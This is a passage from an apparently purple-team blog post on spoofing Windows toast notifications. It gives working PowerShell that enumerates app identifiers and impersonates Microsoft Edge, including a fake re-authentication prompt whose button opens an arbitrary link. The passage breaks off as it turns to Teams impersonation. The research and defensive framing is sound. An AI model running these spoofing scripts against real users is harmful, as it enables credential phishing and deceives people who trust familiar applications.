The Application User Model ID (AUMID) is a unique identifier that Windows assigns to modern applications. It enables Windows to identify which applications should receive notifications, how start menu entries are associated, how toast notifications map back to an application etc. Many organizations use Toast Notifications to push internal updates to endpoints such as IT announcements, new policy rollouts, password expiry, VPN reminders etc. Threat actors could use toast notifications to social engineer users to perform an action that could lead to credential harvesting or lateral movement. Playbook Toast notifications have been weaponized since the early days of Windows 8.1. Specifically, Fox-It has released a PowerShell script called Invoke-CredentialPhisher that could implement different toast notifications to social engineer the user that has an interactive session. However, due to operating system changes in newer versions of Windows the script doesn’t work. Marco a security researcher, has released a beacon object file supplemented with PowerShell snippets that could be used to conduct multiple scenarios to manipulate the user to click on arbitrary links and perform actions. Scenarios using toast notifications can be highly effective because trusted applications are involved, making it difficult for users to identify notifications that have malicious intent. Enumeration of the Application User Model IDs that are registered on the system could be achieved by querying the Start Menu applications: $uwp = Get-StartApps | Select-Object -ExpandProperty AppID $lnk = & { $paths = @( "$env:APPDATA\Microsoft\Windows\Start Menu\Programs", "$env:ProgramData\Microsoft\Windows\Start Menu\Programs" ) $shell = New-Object -ComObject Shell.Application foreach ($path in $paths) { Get-ChildItem $path -Recurse -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object { $folder = $shell.Namespace($_.DirectoryName) $item = $folder.ParseName($_.Name) $item.ExtendedProperty("System.AppUserModel.ID") } } } ($uwp + $lnk) | Where-Object { $_ } | Sort-Object -Unique AUMID Enumeration – PowerShell Script AUMID Enumeration Alternatively, there is a PowerShell cmdlet that could be used to enumerate all installed AppX packages (Universal Windows Platform and MSIX packaged Win32 apps). Get-AppxPackage | Select Name, PackageFamilyName AUMID Enumeration The third option is to query the registry hive that stores notification-capable applications. $notificationPaths = @( "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings", "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" ) $registeredApps = foreach ($path in $notificationPaths) { if (Test-Path $path) { Get-ChildItem $path | Select-Object -ExpandProperty PSChildName } } $registeredApps | Sort-Object -Unique AUMID Enumeration – Registry The script below loads WinRT types into PowerShell, defines the Application User Model ID (AUMID), build the toast XML, load the XML into a WinRT XML document, creates the toast notification object and finally creates the notifier for the chosen AUMID. The command $notifier.Show ($toast) displays the notification. Add-Type -AssemblyName System.Runtime.WindowsRuntime [Windows.UI.Notifications.ToastNotificationManager,Windows.UI.Notifications,ContentType=WindowsRuntime] [Windows.Data.Xml.Dom.XmlDocument,Windows.Data.Xml.Dom.XmlDocument,ContentType=WindowsRuntime] $AUMID = "MSEdge" # the AUMID string $xml = @" <toast> <visual> <binding template="ToastGeneric"> <text>Windows Update</text> <text>Visit ipurple.team</text> </binding> </visual> </toast> "@ $doc = New-Object Windows.Data.Xml.Dom.XmlDocument $doc.LoadXml($xml) $toast = [Windows.UI.Notifications.ToastNotification]::new($doc) $notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier($AUMID) $notifier.Show($toast) MS Edge Notification An alternative scenario is to use an application such as Edge to coerce the user re-authenticate and supply credentials or use a button to visit an arbitrary URL. Add-Type -AssemblyName System.Runtime.WindowsRuntime [Windows.UI.Notifications.ToastNotificationManager,Windows.UI.Notifications,ContentType=WindowsRuntime] [Windows.Data.Xml.Dom.XmlDocument,Windows.Data.Xml.Dom.XmlDocument,ContentType=WindowsRuntime] $AUMID = "MSEdge" # the AUMID string $xml = @" <toast> <visual> <binding template="ToastGeneric"> <text>Action Required</text> <text>Your session requires re-authentication. Click to continue.</text> </binding> </visual> <actions> <action content="Continue" activationType="protocol" arguments="https://ipurple.team"/> </actions> </toast> "@ $doc = New-Object Windows.Data.Xml.Dom.XmlDocument $doc.LoadXml($xml) $toast = [Windows.UI.Notifications.ToastNotification]::new($doc) $notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier($AUMID) $notifier.Show($toast) MS Edge Notification Button ipurple.team It is also possible to abuse the Microsoft Teams AUMID to impersonate...